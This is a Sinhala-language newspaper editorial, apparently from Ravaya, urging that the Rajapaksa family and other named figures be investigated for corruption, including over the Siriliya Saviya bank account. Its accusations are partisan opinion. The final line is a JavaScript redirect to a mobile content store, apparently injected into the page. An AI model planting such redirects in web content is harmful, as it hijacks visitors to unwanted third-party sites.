රාවය

දූෂිතයන් පිටුදැකීම යහ පාලනය යි.

දූෂිතයන් පිටුදැකීම යහ පාලනය යි.

 

හිටපු ජනාධිපති බිරිඳ වන ශිරන්ති රාජපක්‍ෂ මහත්මිය පොලිස් මූල්‍ය අපරාධ කොට්ඨාසය වෙත කැඳවීම ද දැන් ජාතික ප‍්‍රශ්නයක් බවට පත්ව තිබේ. ඇයගේ පුත් පාර්ලිමේන්තු මන්ත‍්‍රී නාමල් රාජපක්‍ෂ කියන්නේ, ඇය එවැනි වධයකට භාජනය නොවිය යුතු බව ය.

අපරාධ සැකකරුවන් නීතිය ඉදිරියට ගෙන ඒම අන් කවරදා වත් නොවූ ආකාරයෙන් ජාතික ප‍්‍රශ්නයක් බවට පත්කර ගැනීමට හිටපු ජනාධිපති මහින්ද රාජපක්‍ෂ මහතාට හා ඔහුගේ අනුගාමිකයන්ට හැකි වී තිබේ. අපරාධ පරීක්‍ෂණ සිදුකිරීම ඔවුහු ප‍්‍රසිද්ධියේ විවේචනය කරති. ප‍්‍රකාශ සටහන් කර ගැනීමට ඔවුන්ගේ සගයකු අල්ලස් කොමිසමට හෝ පොලිසියට කැඳවූ විට ඊට එරෙහි ව උද්ඝෝෂණ සංවිධානය කරති. අල්ලස් කොමිසමේ අධ්‍යක්‍ෂ ජෙනරාල් ඉවත් කරන්නයැ’යි ඉල්ලමින් පාර්ලිමේන්තුවේ රාත‍්‍රී බහිරව පූජා පවත්වති. අවසානයේ, අත්අඩංගුවට නොගන්නයැ’යි ඉල්ලමින් ශ්‍රේෂ්ඨාධිකරණය ඉදිරියට ගොස්, තමන්ට හිතවත් විනිසුරුවරුන් ලවා අත්අඩංගුවට ගැනීම තහනම් කරමින් නියෝග ලබා ගනිති. මේ සියල්ල පිටුපස සිටින්නෝ එක්කෝ අන්ත දූෂිතයෝ ය. නැතිනම් දූෂිතයන්ගෙන් දවස් පතා භෝජනය ලද, එ නිසා ම සිය පැවැත්ම සඳහා දූෂිතයන් ආරක්‍ෂා කර ගැනීම අවශ්‍ය වන්නෝ ය. දැන්, මේ පෙරහරේ අලූත් ම නැට්ටුක්කාරයා වී සිටින්නේ, ලංකාවේ සිටි අපකීර්තිමත් ම අගවිනිසුරුවරයා වූ, රටේ අධිකරණයේ ගෞරවය පාෂාණීභූත කිරීමට අද්විතීය මෙහෙයක් කළා වූ සරත් නන්ද සිල්වා මහතා ය. ඔහු දැන් කියන්නේ, බරපතළ මූල්‍ය අපරාධ විමර්ශනය කිරීමට විශේෂ ඒකකයක් පිහිටු වූ පොලිස්පතිවරයාගේ රෙදි ගැලවිය යුතු බව ය. පොලිස්පතිවරයාගේ රෙදි ගැලවීමට යෝජනා කරන්නේ අඩු ගණනේ රෙදි ඇඳගෙන සිටින්නකු නම්..

රටේ මහජන දේපළ කොල්ලකෑවුන් නීතිය ඉදිරියට පමුණුවා ඔවුන්ට දඬුවම් දිය යුතු ය යන්න වැදගත් සටන් පාඨයක් බවට පත්වූයේ පසුගිය ජනාධිපතිවරණයේ දී ය. ඒ සටන් පාඨයට ජනාධිපතිවරණයේ දී ලක්‍ෂ 62ක ජනතාවගේ අනුමැතිය ලැබිණි. ඒ නිසා නීතිය ක‍්‍රියාත්මක කරන ආයතන විසින් මහජන දේපළ කොල්ලකරුවන්ගෙන් ප‍්‍රකාශ සටහන් කර ගැනීම ද, ඔවුන් අත්අඩංගුවට ගැනීම ද, ඔවුන්ට විරුද්ධව නඩු පවරා සාධාරණ නඩු විභාගයකින් ඔවුන්ට දඬුවම් පැමිණවීම ද ආදි වශයෙන් නීතිය නිසි අයුරින් ක‍්‍රියාත්මක කරනවා දැකීම මේ රටේ බහුතරයක් ජනතාවගේ අභිලාෂයයි. එය කිසිදු අයුරකින් ලූහු කරන්නට, ලූහු වනවා දකින්නට ඒ මහජනතාවගේ කැමැත්තක් නැත. ඒ කටයුතු නිසි පරිදි කරන්නට පවත්නා විමර්ශන ආයතනවලට හැකියාව, අත්දැකීම් හා පළපුරුද්ද නැති නම් ඒ සම්බන්ධයෙන් විශේෂඥතා ඥානය සහිත නිලධාරීන්ගෙන් සැදුම් ලත් අලූත් පොලිස් කොට්ඨාස පිහිටුවීමේ කිසිදු වරදක් ද නැත.

රටේ නීතියට සියල්ලෝ ම යටත් ය. ඊට ඉහළින් කිසිවෙක් නැත. ඒ නිසා හිටපු ජනාධිපතිවරයා ද, ඔහුගේ බිරිඳ ද, පුතුන් සහෝදරයන් හා නෑසියන් ද, මැතිඇමතිවරුන් ද කිසිම වෙනසක් නැති ව ඒ නීතියට යටත් විය යුතු ය. එනයින් ම, දළදා මාලිගාවේ දියවඩන නිලමේ ද ඒ නීතියට යටත් ය. අපරාධයක් ගැන ඔහු සැකකරුවකු නම්, නීතියේ කාර්ය පටිපාටියට යටත් ව ඔහුගෙන් සාධාරණ ව පරිදි ප‍්‍රශ්න කිරීමට, අවශ්‍ය නම් අත්අඩංගුවට ගැනීමට ද පොලිසියට බියක් සැකක්, බලපෑමක් නොතිබිය යුතු ය. ඔහුට ඇති චෝදනාව දළදා මාලිගයට අයත් දේපළ විකුණා ගැනීම යි. ඔහු එලෙස මාලිගාවේ දේපළ සොරකම් කළා ද යන්න ගැන නිසි විමර්ශනයකින් ප‍්‍රතිලාභ ලැබෙන්නේ මාලිගාවට ම ය. ඒ ගැන විමර්ශන කිරීම බුද්ධාගමට හානියක් නොවේ. යහපතකි.

ශිරන්ති රාජපක්‍ෂ මහත්මියගේ සිරිලිය සවිය ව්‍යාජ ගිණුම ගැන රටට හෙළිකළේ රාවය යි. ව්‍යාජ ජාතික හැඳුනුම්පත්වලින් එම ගිණුම ආරම්භ කර තිබුණා පමණක් නො ව, ඊට ලැබුණු අතිවිශාල මුදල් වරින් වර ගිණුමෙන් ඉවත්කරගෙන තිබුණේ ද මේ ව්‍යාජ හැඳුනුම්පත් යොදාගෙන ය. ඒ පුවතෙන් පසු බැංකුව කළේ, ගිණුම ගැන තොරතුරු පිටතට දුන්නේ කවුදැ’යි සොයමින් බැංකුවේ පරිගණක ක‍්‍රියාකරුවන් දඩයමේ යෑම යි. ඒ අතර, ගිණුමේ ඇති මිලියන 43ක මුදල වහා ඉවත්කර ගැනීමට සිරිලිය සවිය හිමිකරුවෝ උත්සාහ දැරූහ. ඒ මුදල ගෙවා දැමීමට බැංකුවේ ඉහළ නිලයන්ගෙන් අනුමැතිය ද ලැබී තිබුණි. මේ තත්ත්වය මත, එම මුදල නොගෙවා ගිණුම අත්හිටුවා ගන්නට විශේෂ පරිශ‍්‍රමයක් දරන්නට සිදුවිය. රටේ මහජන දේපළ කොල්ලකරුවන්ගේ සූක්‍ෂ්ම ක‍්‍රියාන්විතය ඒ සා බලවත් ය.
මේ පිරිස නීතිය ඉදිරියට ගෙනැවිත් ප‍්‍රශ්නකොට ඔවුන්ට දඬුවම් ලබා දීම මේ යුගයේ යහ පාලනය යි.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;